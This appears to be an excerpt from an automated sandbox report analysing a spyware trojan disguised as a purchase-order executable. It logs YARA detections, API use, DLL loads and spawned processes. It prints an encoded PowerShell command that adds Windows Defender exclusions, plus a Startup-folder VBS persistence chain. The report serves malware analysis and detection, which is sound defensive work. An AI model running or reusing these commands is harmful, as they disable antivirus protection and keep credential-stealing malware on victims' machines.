                      Source: 18.2.ofg.exe.3e418f0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 18.2.ofg.exe.3e418f0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 13.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: purchase order T&B19-20PO128.exe, IdentifiableCompressor.csCryptographic APIs: 'CreateDecryptor'
                      Source: ofg.exe.0.dr, IdentifiableCompressor.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.purchase order T&B19-20PO128.exe.3a1c450.4.raw.unpack, IdentifiableCompressor.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.purchase order T&B19-20PO128.exe.3519550.1.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.purchase order T&B19-20PO128.exe.3519550.1.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.purchase order T&B19-20PO128.exe.3519550.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.purchase order T&B19-20PO128.exe.3519550.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.purchase order T&B19-20PO128.exe.3519550.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.purchase order T&B19-20PO128.exe.3519550.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.purchase order T&B19-20PO128.exe.5ab0000.13.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.purchase order T&B19-20PO128.exe.5ab0000.13.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.purchase order T&B19-20PO128.exe.5ab0000.13.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.purchase order T&B19-20PO128.exe.5ab0000.13.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 0.2.purchase order T&B19-20PO128.exe.3b27a00.9.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.purchase order T&B19-20PO128.exe.3b27a00.9.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.purchase order T&B19-20PO128.exe.5ab0000.13.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.purchase order T&B19-20PO128.exe.5ab0000.13.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.purchase order T&B19-20PO128.exe.5ab0000.13.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.purchase order T&B19-20PO128.exe.3b27a00.9.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.purchase order T&B19-20PO128.exe.3b27a00.9.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.purchase order T&B19-20PO128.exe.5ab0000.13.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.purchase order T&B19-20PO128.exe.5ab0000.13.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 0.2.purchase order T&B19-20PO128.exe.3b27a00.9.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.purchase order T&B19-20PO128.exe.3b27a00.9.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.purchase order T&B19-20PO128.exe.3b27a00.9.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 0.2.purchase order T&B19-20PO128.exe.5ab0000.13.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.purchase order T&B19-20PO128.exe.3b27a00.9.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@31/6@1/2
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ofg.vbsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3520:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1212:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2296:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0dlejsmb.fbf.ps1Jump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ofg.vbs"
                      Source: purchase order T&B19-20PO128.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: purchase order T&B19-20PO128.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: purchase order T&B19-20PO128.exeVirustotal: Detection: 43%
                      Source: purchase order T&B19-20PO128.exeReversingLabs: Detection: 28%
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeFile read: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\purchase order T&B19-20PO128.exe "C:\Users\user\Desktop\purchase order T&B19-20PO128.exe"
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABwAHUAcgBjAGgAYQBzAGUAIABvAHIAZABlAHIAIABUACYAQgAxADkALQAyADAAUABPADEAMgA4AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAcAB1AHIAYwBoAGEAcwBlACAAbwByAGQAZQByACAAVAAmAEIAMQA5AC0AMgAwAFAATwAxADIAOAAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAbwBmAGcALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAbwBmAGcALgBlAHgAZQA=
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ofg.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\ofg.exe "C:\Users\user\AppData\Roaming\ofg.exe"
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /releaseJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABwAHUAcgBjAGgAYQBzAGUAIABvAHIAZABlAHIAIABUACYAQgAxADkALQAyADAAUABPADEAMgA4AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAcAB1AHIAYwBoAGEAcwBlACAAbwByAGQAZQByACAAVAAmAEIAMQA5AC0AMgAwAFAATwAxADIAOAAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAbwBmAGcALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAbwBmAGcALgBlAHgAZQA=Jump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renewJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\ofg.exe "C:\Users\user\AppData\Roaming\ofg.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /releaseJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ofg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renewJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
